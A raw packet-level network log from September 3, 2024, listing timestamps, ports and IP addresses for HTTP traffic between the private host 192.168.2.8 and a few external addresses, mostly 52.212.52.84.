Sep 3, 2024 17:13:23.074342966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074356079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074367046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074379921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074383974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074395895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074405909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074408054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074419975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074419975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074419975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074430943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074449062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074460983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074470997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074471951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074471951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074484110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074492931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074493885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074506044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.074536085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074536085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.074747086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075432062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075444937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075455904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075467110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075478077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075488091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075500011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075500965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075519085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075531006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075541019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075551033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075562954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075572968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075577021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075577021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075577021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075584888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075597048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075607061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075618029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075630903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075632095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075644016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075654030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075656891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075656891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075665951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075685024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075687885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075696945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075709105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075715065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075722933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075727940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075727940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075735092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075747013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075753927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075757980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.075769901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075769901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075802088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.075802088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076720953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076734066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076745987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076756954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076767921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076780081 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:23.076812983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076822996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076833963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076834917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:23.076843977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076853991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076858044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076858044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076867104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076879025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076889038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076890945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076909065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076911926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076917887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076925993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076937914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076944113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076944113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076948881 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076961994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076967001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076976061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076987028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.076992989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076992989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076992989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.076997042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077008009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077018976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077029943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077047110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077053070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077053070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077053070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077061892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077074051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077089071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077089071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077198982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077774048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077785969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077795982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077809095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077819109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077828884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077841997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077852011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077868938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077886105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077897072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077903032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077910900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077922106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077924967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077924967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077933073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077944994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077955008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077955961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077965975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077972889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.077980042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.077991009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078001022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078011990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078022957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078028917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078028917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078028917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078033924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078044891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078049898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078049898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078057051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078068018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078078985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078087091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078090906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078103065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078124046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078273058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078313112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078325033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078336000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078346968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078356028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078367949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078378916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078389883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078397036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078397036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078398943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078411102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078433037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078433037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078452110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078464031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078478098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078489065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078490019 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078496933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078500986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078511953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078524113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078535080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078546047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078552961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078552961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078557968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078568935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078578949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078586102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078586102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078589916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078602076 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078613043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078618050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078618050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078624010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078634977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078649044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078682899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078748941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.078970909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078983068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.078994036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079005003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079016924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079027891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079036951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079041958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079052925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079061985 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079065084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079077005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079083920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079083920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079088926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079122066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079133034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079143047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079144955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079144955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079154968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079165936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079178095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079189062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079194069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079200983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079212904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079214096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079229116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079231977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079237938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079241037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079252958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079262972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079276085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079283953 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079286098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079298973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079302073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079360008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079360008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079502106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.079705954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079716921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079727888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079737902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079747915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079758883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079770088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079782009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079792976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079803944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079808950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079832077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079843998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.079857111 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.079869032 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.080142975 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.080168009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.081293106 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:23.086388111 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.089709044 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.095084906 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.114361048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114375114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114387035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114459038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114494085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114505053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114516020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114526987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114536047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114556074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114586115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114595890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114607096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114612103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114619970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114636898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114675999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114675999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.114748001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114761114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114772081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.114831924 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115335941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115431070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115442991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115464926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115494013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115504980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115514994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115525961 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115531921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115629911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115629911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115699053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115710020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115716934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115725994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115746021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115756989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115766048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115766048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115767956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115781069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115791082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115799904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115812063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.115816116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115816116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115844011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.115978956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116122007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116132975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116230011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116270065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116286993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116350889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116350889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116699934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116714954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116751909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116751909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116838932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116849899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116859913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116885900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116897106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.116918087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.116918087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117001057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.117311001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117328882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.117340088 CEST	80	49730	52.212.52.84	192.168.2.8
